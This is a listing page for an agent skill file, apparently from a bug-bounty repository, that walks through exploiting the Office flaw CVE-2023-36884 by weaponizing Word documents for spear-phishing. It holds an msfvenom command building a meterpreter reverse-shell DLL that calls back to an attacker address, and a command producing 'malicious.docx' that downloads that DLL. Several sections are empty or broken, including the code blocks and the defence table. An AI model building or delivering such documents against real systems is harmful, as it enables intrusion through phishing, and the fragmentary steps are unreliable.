Cve 2023 36884 office rce
Skill ShulkwiSEC/bb-huge/skills/curated/cve-2023-36884-office-rce
bb-huge ๐ค , Personal bug bounty findings hub and bug bounty orchestration for multiple agents
npx -y skills add ShulkwiSEC/bb-huge --skill cve-2023-36884-office-rceAssembled from the repository path, not quoted from the project. Check it against their README if it does not work.
One thing to look at
- 18 stars18 stars. Stars are a popularity signal and not a quality one, but at this level it is likely that nobody has read this closely except its author, and you would be relying on your own review.
What its author says it does
Copied from the file, not written here
Exploit CVE-2023-36884, a critical Remote Code Execution vulnerability in Windows and Office associated with the Storm-0978 APT. This skill covers the weaponization of malicious Word documents to achieve code execution upon opening, bypassing Mark-of-the-Web (MotW) defenses.
The file declares its own license as Apache-2.0. That is the authorโs claim about this one file, and it is not the same thing as the license GitHub reports for the repository, which is listed with the other numbers below.
SKILL.md
3.9 KB, as published. Nobody here has run it
Exploiting CVE-2023-36884 (Office RCE)
When to Use
- When conducting advanced Red Team operations where initial access relies on sophisticated spear-phishing campaigns.
- To demonstrate the impact of unpatched Office and Windows environments, especially regarding vulnerabilities actively exploited by Advanced Persistent Threats (APTs).
Prerequisites
- Authorized scope and rules of engagement for the target environment
- Appropriate tools installed on the attack/analysis platform
- Understanding of the target technology stack and architecture
- Documentation template ready for findings and evidence capture
Workflow
Phase 1: Understanding CVE-2023-36884
# Concept: CVE-2023-36884 ```
### Phase 2: Payload Generation
```bash
# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f dll > payload.dll
Phase 3: Weaponizing the Office Document
# python3 weaponize_doc.py -t template.docx -p payload.dll -u http://10.10.10.10/payload.dll -o malicious.docx
Phase 4: Delivery and Execution
# ```
#### Decision Point ๐
```mermaid
flowchart TD
A[Craft Document ] --> B{MotW Bypassed ]}
B -->|Yes| C[Achieve Execution ]
B -->|No| D[Modify Payload ]
๐ต Blue Team Detection & Defense
- Patch Management: Attack Surface Reduction (ASR): MotW Enforcement: Key Concepts | Concept | Description | |---------|-------------|
Output Format
Cve 2023 36884 Office Rce โ Assessment Report
============================================================
Target: [Target identifier]
Assessor: [Operator name]
Date: [Assessment date]
Scope: [Authorized scope]
MITRE ATT&CK: [Relevant technique IDs]
Findings Summary:
[Finding 1]: [Severity] โ [Brief description]
[Finding 2]: [Severity] โ [Brief description]
Detailed Results:
Phase 1: [Phase name]
- Result: [Outcome]
- Evidence: [Screenshot/log reference]
- Impact: [Business impact assessment]
Phase 2: [Phase name]
- Result: [Outcome]
- Evidence: [Screenshot/log reference]
- Impact: [Business impact assessment]
Risk Rating: [Critical/High/Medium/Low/Informational]
Recommendations:
1. [Immediate remediation step]
2. [Long-term hardening measure]
3. [Monitoring/detection improvement]
๐ Shared Resources
For cross-cutting methodology applicable to all vulnerability classes, see:
_shared/references/elite-chaining-strategy.mdโ Exploit chaining methodology and high-payout chain patterns_shared/references/elite-report-writing.mdโ HackerOne-optimized report writing, CWE quick reference_shared/references/real-world-bounties.mdโ Verified disclosed bounties by vulnerability class